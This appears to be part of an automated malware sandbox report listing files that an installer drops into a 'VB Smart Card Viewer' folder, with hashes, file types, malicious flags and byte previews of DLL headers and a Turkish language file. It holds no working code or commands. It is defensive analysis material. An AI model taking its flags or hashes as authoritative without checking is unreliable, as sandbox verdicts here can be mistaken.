                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.476081490774289
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:Y8ncCX9jvWgnTMfFj/QhZmyF3yBRAotqlFRHEnWiGGLN:YscCNj3TGFTQhgyF3yBRAyqqV5
                                                                                                                                                                                                                                                                                                                                                                MD5:7C4C4A4D5684E8AACDC6B118A601A7BB
                                                                                                                                                                                                                                                                                                                                                                SHA1:64C8CC24339D73909916E303AB08A253DD49FE3F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:D20E213EF79F5F58CF6CA45812648E21612AF6B82F52EEEE044EA050AB32D75E
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DB34326A59C7E5E809DE1DA9C98D5464D753DD554E9C8DDDC32F164BFE9D637A5D5C6AE093905B8CA075B6801FD0D53E34E6400C7F9E1D553E33618A9BAADEEA
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.......... ...........................................,.....}.....@... ......................@+..>....+.$.....+.h.....................+.l1..........................d-........................+.4............................text...............................`.P`.data...............................@.`..rdata.............................@.`@/4...........`.......B..............@.0@.bss....4. ..@........................`..edata...>...@+..@..................@.0@.idata..$.....+......^..............@.0..CRT....,.....+......n..............@.0..tls..........+......p..............@.0..rsrc...h.....+......r..............@.0..reloc..l1....+..2...v..............@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-OFQS5.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):176200
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.647007817777345
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                                                                                                                                                                                                                                                                                                                MD5:6896DC57D056879F929206A0A7692A34
                                                                                                                                                                                                                                                                                                                                                                SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-S9GPV.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):5607950
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.633599482017416
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:98304:8IS8iFbnejXFHVSh3z6+N5NeOYVxtAcPVBgkgrumYE1HpMTdy2/vlCyUIs:85hCFVSh3fN5NeOYVxLPVBcumzJMTdyx
                                                                                                                                                                                                                                                                                                                                                                MD5:90593C11E9997DD4224CF278D5D66323
                                                                                                                                                                                                                                                                                                                                                                SHA1:A89583C180A66FE2C8272F8CCD9876326CB29A1E
                                                                                                                                                                                                                                                                                                                                                                SHA-256:82AA37DDE211EE28B366603CC9C74F0584ED46D57DF7C06447060BFCFF886A07
                                                                                                                                                                                                                                                                                                                                                                SHA-512:93A8CDFD26B4684FBBCB6FF8487E77C4996BD48B58D38FB81FE7E243D1368342F2ED27A1219CB81A9CBED72FDD4061ACE091D95C326A4C3DFF84D59E9A45114A
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........U........#...$..;...U..b$...........<..............................pz.......U...@... .......................x.......x..#....y.p.................... y.8E...........................gN.....................P.x..............................text...t.;.......;.................`.``.data...\.....<.......;.............@.`..rdata.......<.......<.............@.p@/4.......v....O..x....O.............@.0@.bss.....`$..0T.......................`..edata........x.......T.............@.0@.idata...#....x..$... T.............@.0..CRT....,.....x......DT.............@.0..tls..........y......FT.............@.0..rsrc...p.....y......HT.............@.0..reloc..8E... y..F...LT.............@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\is-VN2OC.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):68552
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.1042544770100395
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                                                                                                                                                                                                                                                                                                                MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                                                                                                                                                                                                                                                                                                                SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                                                                                                                                                                                                                                                                                                                SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\languages\is-K2AG9.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):3188
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.820146923376414
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:r9BirQRr9DW1t0Y+6HcRMRBm8K+0vNZry19:Jk+9Ot0EcF8K+d19
                                                                                                                                                                                                                                                                                                                                                                MD5:0F16041A3EFE467EE8440060A5ED7F8A
                                                                                                                                                                                                                                                                                                                                                                SHA1:6FB9C518E8F468275B4C821DB8D1F64DEC787687
                                                                                                                                                                                                                                                                                                                                                                SHA-256:C84D2F1177AAD5EA224C68F34DA0CD0C8E7308BA1CC93494B3376F52051FAC93
                                                                                                                                                                                                                                                                                                                                                                SHA-512:C362D7C35425DDA7F98CDD597F0CC1ED0510194022E5AB9AB8EC0EDCCDDD5D9214563C7D038A2A3A5FD103093074E6D3190CA374D838AA3DD4E78F75C9D2BDE3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:..[.A.P.P.L.I.C.A.T.I.O.N.].....n.a.m.e.=.F.r.e.e. .M.P.3. .C.u.t.t.e.r. .J.o.i.n.e.r.....v.e.r.s.i.o.n.=.V.2.0.2.3...5.....u.r.l.=.h.t.t.p.s.:././.w.w.w...d.v.d.v.i.d.e.o.m.e.d.i.a...c.o.m./.h.o.w.-.t.o.-.c.u.t.-.m.p.3...h.t.m.l.....[.J.I.E.M.I.A.N.].....y.y.=.D.i.l. .S.e...i.m.i.....m.p.3.j.q.=.M.P.3. .K.e.s.i.c.i.....m.p.3.h.b.=.M.P.3. .B.i.r.l.e._.t.i.r.i.c.i.....k.s.j.q.=.B.a._.l.a.n.g.1... .N.o.k.t.a.s.1.:.:.....k.s.j.q.1.=.K.e.s.i.m. .B.a._.l.a.n.g.1.c.1.....j.s.j.q.=.B.i.t.i._. .N.o.k.t.a.s.1.:.....j.q.s.j.=.K.l.i.p. .S...r.e.s.i.:.....y.w.j.=.K.a.y.n.a.k.....k.s.s.j.=.S...r.e. .B.a._.1.....j.s.s.j.=.S...r.e. .S.o.n.u.....s.c.g.s.=...1.k.t.1. .B.i...i.m.i.....o.u.t.p.u.t.=...1.k.t.1. .D.o.s.y.a.s.1.:.....n.y.k.y.z.j.s.r.=.D.o...r.u.d.a.n. .d...z.e.n.l.e.m.e. .d.e.n.e.t.i.m.i. .g.i.r.i._.i. .y.a.p.1.l.a.c.a.k. .z.a.m.a.n. .b.i...i.m.i. .0.0.:.0.0.:.0.0...0.0.0.(.s.a.:.d.a.:.s.n...s.a.l.).....z.t.=.D.u.r.u.m.....z.b.=.H.a.z.1.r.....s.y.m.t.w.j.=.T...m. .S.e.s. .D.o.s.y.a.l.a.r.1.

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\languages\turkish.ini (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):3188
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.820146923376414
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:r9BirQRr9DW1t0Y+6HcRMRBm8K+0vNZry19:Jk+9Ot0EcF8K+d19
                                                                                                                                                                                                                                                                                                                                                                MD5:0F16041A3EFE467EE8440060A5ED7F8A
                                                                                                                                                                                                                                                                                                                                                                SHA1:6FB9C518E8F468275B4C821DB8D1F64DEC787687
                                                                                                                                                                                                                                                                                                                                                                SHA-256:C84D2F1177AAD5EA224C68F34DA0CD0C8E7308BA1CC93494B3376F52051FAC93
                                                                                                                                                                                                                                                                                                                                                                SHA-512:C362D7C35425DDA7F98CDD597F0CC1ED0510194022E5AB9AB8EC0EDCCDDD5D9214563C7D038A2A3A5FD103093074E6D3190CA374D838AA3DD4E78F75C9D2BDE3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:..[.A.P.P.L.I.C.A.T.I.O.N.].....n.a.m.e.=.F.r.e.e. .M.P.3. .C.u.t.t.e.r. .J.o.i.n.e.r.....v.e.r.s.i.o.n.=.V.2.0.2.3...5.....u.r.l.=.h.t.t.p.s.:././.w.w.w...d.v.d.v.i.d.e.o.m.e.d.i.a...c.o.m./.h.o.w.-.t.o.-.c.u.t.-.m.p.3...h.t.m.l.....[.J.I.E.M.I.A.N.].....y.y.=.D.i.l. .S.e...i.m.i.....m.p.3.j.q.=.M.P.3. .K.e.s.i.c.i.....m.p.3.h.b.=.M.P.3. .B.i.r.l.e._.t.i.r.i.c.i.....k.s.j.q.=.B.a._.l.a.n.g.1... .N.o.k.t.a.s.1.:.:.....k.s.j.q.1.=.K.e.s.i.m. .B.a._.l.a.n.g.1.c.1.....j.s.j.q.=.B.i.t.i._. .N.o.k.t.a.s.1.:.....j.q.s.j.=.K.l.i.p. .S...r.e.s.i.:.....y.w.j.=.K.a.y.n.a.k.....k.s.s.j.=.S...r.e. .B.a._.1.....j.s.s.j.=.S...r.e. .S.o.n.u.....s.c.g.s.=...1.k.t.1. .B.i...i.m.i.....o.u.t.p.u.t.=...1.k.t.1. .D.o.s.y.a.s.1.:.....n.y.k.y.z.j.s.r.=.D.o...r.u.d.a.n. .d...z.e.n.l.e.m.e. .d.e.n.e.t.i.m.i. .g.i.r.i._.i. .y.a.p.1.l.a.c.a.k. .z.a.m.a.n. .b.i...i.m.i. .0.0.:.0.0.:.0.0...0.0.0.(.s.a.:.d.a.:.s.n...s.a.l.).....z.t.=.D.u.r.u.m.....z.b.=.H.a.z.1.r.....s.y.m.t.w.j.=.T...m. .S.e.s. .D.o.s.y.a.l.a.r.1.

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\libbz2-1.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):105784
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.258144336244945
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                                                                                                                                                                                                                                                                MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                                                                                                                                                                                                                                                                SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\libgcc_s_dw2-1.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):125637
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.2640431186303145
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                                                                                                                                                                                                                                                                MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                                                                                                                                                                                                                                                                SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                                                                                                                                                                                                                                                                SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\libiconv-2.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1065100
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.300961775371533
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:gsRe/8fBAUZLYnwPKO6lbbTCpGavkg3NyeuQ6l9fHOfD:gzKBAUZLYwiO6UpGaXBuQQ9uD
                                                                                                                                                                                                                                                                                                                                                                MD5:B7DF9B43BF812DDAF60C99732C1AB273
                                                                                                                                                                                                                                                                                                                                                                SHA1:4A90353C8B2845008483854642B711E917F9CEEF
                                                                                                                                                                                                                                                                                                                                                                SHA-256:74024FE9B8A1E4F8B9B7561B336B2916A20784699CDEEF2948074F0E820C9BDE
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DB78A8AF90E8557BA37DF1B8C089B8C2E6D912CB08A7B633126541FA9A2E91A0DD90E275A83D323DB0E38BB464744225B0FD405A2C828170B5B7AC1333D6C6E7
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........8..:......#...#.....4.................... f................................V>....@... ......................P.......`..............................................................0.......................$a...............................text...............................`.P`.data...T...........................@.0..rdata..............................@.`@/4.......Q.......R..................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....,....p......................@.0..tls................................@.0..rsrc...............................@.0..reloc...............$..............@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\libogg-0.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):40974
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.485702128133584
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                                                                                                                                                                                                                                                                                                                MD5:F47E78AD658B2767461EA926060BF3DD
                                                                                                                                                                                                                                                                                                                                                                SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                                                                                                                                                                                                                                                                                                                SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                                                                                                                                                                                                                                                                                                                SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbis-0.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):176200
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.647007817777345
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                                                                                                                                                                                                                                                                                                                MD5:6896DC57D056879F929206A0A7692A34
                                                                                                                                                                                                                                                                                                                                                                SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbisenc-2.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):555894
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4167624637949925
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:TnOHRuNruVRJ/RbM4YkuYFSwqFux5T8hac1eQ3RcMLQa9gKutRJhuusoAu3FsWVI:2z8wqux5TEacQmRcMcpfLnFQ
                                                                                                                                                                                                                                                                                                                                                                MD5:77A96C1C8E72D12BE4DFA5600A67E0F4
                                                                                                                                                                                                                                                                                                                                                                SHA1:F1A94189F7DA47DB26E332024C255AFAA085A654
                                                                                                                                                                                                                                                                                                                                                                SHA-256:E6A08981AB88E25B892DB826D75EBE4C3A9EC932704F722B3E32E5D9C8CD359C
                                                                                                                                                                                                                                                                                                                                                                SHA-512:267951B1CF2C745DA69265EEF7E921FF4A9F07C49000EB30D3C1793634C6AB61AB3A897E418A56C77C3F8F735AA2844FC6BF564DC2D88C9C0835A37A318AD52B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........v..$......#...#.:...r...............P.....k......................................@... .................................t............................................................Z.........................|............................text....8.......:..................`.P`.data...D....P.......>..............@.0..rdata..$....`.......@..............@.`@/4......L....`.......@..............@.0@.bss.........p........................0..edata...............L..............@.0@.idata..t............N..............@.0..CRT....,............R..............@.0..tls.................T..............@.0..reloc........... ...V..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\libwinpthread-1.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):68552
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.1042544770100395
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                                                                                                                                                                                                                                                                                                                MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                                                                                                                                                                                                                                                                                                                SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
